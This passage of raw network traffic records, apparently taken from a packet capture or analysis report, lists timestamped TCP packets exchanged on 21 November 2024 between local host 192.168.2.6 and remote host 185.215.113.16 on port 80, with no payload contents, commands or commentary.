                                                                                                                                                                        Nov 21, 2024 10:37:48.526793003 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.526839018 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.527177095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.527343988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.527488947 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.528091908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.528249979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.528292894 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.529026031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.529125929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.529170036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.529917002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.530126095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.530163050 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.530853033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.531065941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.531115055 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.531773090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.531887054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.532095909 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.532706976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.532824039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.532885075 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.533610106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.533715010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.533754110 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.534540892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.534637928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.534682989 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.535478115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.535633087 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.535703897 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.536420107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.536595106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.536691904 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.537327051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.537441015 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.537503958 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.538220882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.538374901 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.538460016 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.539158106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.539392948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.539465904 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.540050030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.540210009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.540466070 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.540987968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.541088104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.541130066 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.541946888 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.542082071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.542125940 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.542886972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.542958021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.543003082 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.543838978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.544060946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.544244051 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.544822931 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.544919968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.544960976 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.545598984 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.545706034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.545753002 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.546530962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.546550989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.546597958 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.547441959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.547573090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.547660112 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.548357010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.548491955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.548536062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.549308062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.549534082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.549577951 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.550206900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.550302982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.550357103 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.551120043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.551259995 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.551341057 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.552133083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.552243948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.552287102 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.552977085 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.553106070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.553150892 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.553881884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.554124117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.554172993 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.554852009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.554984093 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.555037975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.555752039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.555855036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.555898905 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.556651115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.556746960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.557074070 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.557641029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.557655096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.557701111 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.558500051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.558598995 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.558646917 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.559464931 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.559568882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.559609890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.560353994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.560517073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.560556889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.561265945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.561482906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.561523914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.562206984 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.562374115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.562597990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.563106060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.563236952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.563285112 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.564024925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.564171076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.564218044 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.564974070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.565057039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.565125942 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.565902948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.566215038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.566262960 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.566802025 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.566921949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.566960096 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.567732096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.567847967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.567895889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.568646908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.568773031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.568808079 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.569591045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.569760084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.570029974 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.570514917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.570768118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.571271896 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.571484089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.571556091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.571726084 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.572346926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.572491884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.573271036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.573319912 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.573379993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.574208021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.574254036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.574285030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.575072050 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.575120926 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.728010893 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.728059053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.728296041 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.728383064 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.728573084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.728619099 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.728689909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.729577065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.729614019 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.729672909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.730495930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.730535984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.730556011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.731307030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.731368065 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.731395006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.732350111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.732409000 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.732445955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.733225107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.733237028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.733280897 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.734061956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.734112978 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.734148979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.735013008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.735068083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.735136986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.735940933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.736006975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.736022949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.736833096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.736884117 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.736973047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.737766027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.737804890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.737842083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.738681078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.738735914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.738797903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.739597082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.739658117 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.739681005 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.740514040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.740581036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.740648031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.741497040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.741538048 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.741565943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.742432117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.742497921 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.742533922 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.743309021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.743371964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.743415117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.744254112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.744309902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.744632959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.745187044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.745244026 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.745310068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.746084929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.746125937 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.746191978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.747011900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.747067928 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.747108936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.747920990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.747977972 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.748032093 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.748847008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.748903990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.748920918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.749764919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.749808073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.749855042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.750653028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.750705004 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.750773907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.751652002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.751722097 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.751857042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.752541065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.752588987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.752633095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.753501892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.753518105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.753650904 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.754426956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.754502058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.754507065 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.755300045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.755333900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.755373001 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.756218910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.756263018 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.756334066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.757188082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.757251978 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.757354975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.758086920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.758151054 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.758155107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.759025097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.759088039 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.759253025 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.759947062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.759984016 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.759998083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.760867119 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.760927916 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.760937929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.761753082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.761806965 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.761838913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.762739897 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.762813091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.762861967 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.763709068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.763721943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.763766050 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.764523983 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.764591932 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.764621973 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.765414000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.765463114 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.765527964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.766406059 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.766464949 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.766546965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.767299891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.767349005 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.767416954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.768251896 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.768304110 CET4978780192.168.2.6185.215.113.16
